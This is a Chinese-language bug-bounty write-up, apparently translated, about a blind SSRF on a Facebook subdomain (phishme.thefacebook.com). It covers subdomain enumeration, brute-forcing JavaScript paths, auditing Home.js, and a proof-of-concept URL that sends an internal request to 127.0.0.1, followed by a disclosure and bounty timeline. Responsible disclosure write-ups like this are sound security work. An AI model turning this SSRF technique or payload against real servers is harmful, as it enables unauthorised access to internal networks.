子域名枚举 + 扫描路径 + JS分析 = 一万美金无回显ssrf

这是我在Facebook上发现的有关SSRF漏洞的文章,该漏洞可能允许恶意用户向Facebook公司网络发送内部请求。

1)子域枚举

通过进行一些子域枚举,我发现了以下子域:phishme.thefacebook.com

如果您读过我以前的文章《我在Facebook上发现的一个奇怪漏洞的故事》,您已经知道我对这个403错误有多喜欢了。

2)Javascript文件暴力破解扫描

通过使用自定义的单词列表并强制执行以下路径:https://phishme.thefacebook.com/ ** .js

我找到了一个隐藏的Home.js文件(https://phishme.thefacebook.com/Home.js)

Home.js的代码审计

通过 分析Home.js文件的代码,我发现了一个有趣的函数“ sendPhishRequest”,该函数使用XMLHttpRequest从某些特定链接中请求数据。

通过深入研究代码,我发现此功能的用法如下:

Util.sendPhishRequest(‘PhishGetItemData.ashx’, { itemId: itemId, ewsUrl: ewsUrl, token: token }

开始利用:

在尝试了几种随机令牌格式之后,我终于能够成功利用该错误来发送内部请求。

参数:

itemId: 123
ewsUrl: http://127.0.0.1:PORT
token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

POC:

https://phishme.thefacebook.com/PhishGetItemData.ashx?itemId=123&ewsUrl=http://127.0.0.1:PORT/&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

堆栈跟踪有助于收集有关发送的内部请求的信息。

报告时间流程:

2020年8月7日:报道
2020年8月11日:审核
2020年8月11日:修补的
2020年12月3日:解决
2020年12月3日: $ 10000赏金奖励

一万美金的face book ssrf漏洞相关推荐

  1. 算捡漏么?我发现了一个值2万美金的 Facebook DOM XSS 漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 通过 postMessage造成的 DOM XSS 漏洞是一个被低估的漏洞,很多漏洞猎人基本不会注意这个漏洞. 最近,我开始查看客户端 ...

  2. 研究员发现 Google Cloud 项目中的 SSRF 漏洞,获1万美元奖金

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 摘要 安全研究员David Schütz 发现谷歌 Cloud 项目中存在一个 URL 解析漏洞,可导致项目易受服务器端请求伪造(SSRF)攻击 ...

  3. SSRF 漏洞危害大,应避免被利用攻击内网应用!| 原力计划

    作者 | Qwzf 责编 | 夕颜 头图 | CSDN付费下载自视觉中国 出品 | CSDN博客 前言 SSRF漏洞和CSRF漏洞有一些相似之处:CSRF跨站请求伪造,基于客户端的请求伪造:SSRF服 ...

  4. 独立开发变现周刊(第41期):一个开源项目一个人每月收入8万美金

    分享独立开发.产品变现相关内容,每周五发布. 目录 1.Budibase: 开源的低代码平台 2.沃尔玛通过SEO每月获得2.5亿流量的秘密 3.DesignJoy: 一个人的设计团队,月收入9万美金 ...

  5. 独立开发变现周刊(第51期):辞去普通程序员工作,独立开发产品年收入20万美金...

    分享独立开发.产品变现相关内容,每周五发布. 目录 1.小舒同学:让我好好整理下你的收藏夹 2.VistaCreate: 免费的在线平面设计工具 3.WhatRuns: 帮助您识别任何网站上使用的技术 ...

  6. 报名 | 赢取20万美金!Call For Code编程马拉松北京站来袭!

    你想通过技术改变未来的世界,并挽救生命吗? 你想组织小伙伴一同参赛,并获得20万美金吗? 你想和全球专业的开发者一同开发,并学习最前沿的AI.IoT等技术吗? 如果你内心中的答案是肯定的话...... ...

  7. 渗透知识-SSRF漏洞

    SSRF漏洞攻击原理及防御方案 01 概念 服务端请求伪造(Server-Side Request Forgery),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好 ...

  8. 年薪50万美金的工程师到底牛在哪里?

    为什么80%的码农都做不了架构师?>>>    年薪 50 万美金的工程师他们究竟做哪些事情,或是拥有哪些技术,让他们如此值钱?这些东西有办法"学"吗? 之前 B ...

  9. 一台加密货币ATM机月营收额高达3万美金

    一台加密货币ATM机月营收额高达3万美金

最新文章

  1. 设计模式之访问者模式(Visitor)摘录
  2. 汇编程序-更灵活的定位内存地址方法
  3. js获取url的参数
  4. 【RESTful风格】软件接口设计中RESTful风格
  5. Java泛型教程–示例类,接口,方法,通配符等
  6. [js] 不用 + eval Function 实现加法
  7. java工商银行项目_ChaosBlade 在工商银行混沌工程体系中的应用实践
  8. LeetCode-151 Reverse Worlds in a String
  9. Spark学习笔记(一)
  10. 企业微信有定位跟踪吗?企业微信会跟踪员工轨迹记录吗?
  11. 【致远OA】快速修复安装A6的方法
  12. html中banner怎么写,banner图欣赏
  13. 计步器 c语言,ADXL345单片机计步器程序
  14. 通过PyQt5+PyQtWebEngine+pyecharts建立自己的收入支出记账软件
  15. 苹果电脑与xcode的快捷键
  16. 来自#Devoxx 2014的WebSocket螺母和螺栓的幻灯片
  17. 配置管理--版本控制的目的
  18. 解决Selenium2Library中的select frame无法选择没有名字,没有id的frame或者iframe的问题
  19. chartContrl 折线图添加报警线和一些其他设置 放大缩小折线图等
  20. Development Mode 和 Production Mode

热门文章

  1. 主成分分析逆变换_主成分分析(PCA)(转)
  2. mysql 5.7免装版教程_mysql 5.7.9 免安装版配置方法图文教程
  3. 哈佛大学公开课:计算机科学cs50 学习笔记(第6集:C语言,RAM)
  4. 如何基于报表工具FineReport进行二次开发
  5. 机器人系统计算机控制技,计算机控制系统在机器人技术中的应用
  6. 分销级差奖励制度实现思路
  7. google scholar按照 引用量进行排序 harzing Publish or Perish
  8. 【RabbitMQ】RabbitMQ架构模型
  9. java播放器_java播放器
  10. 【转】用opencv使摄像头在30fps下捕获1080p的数据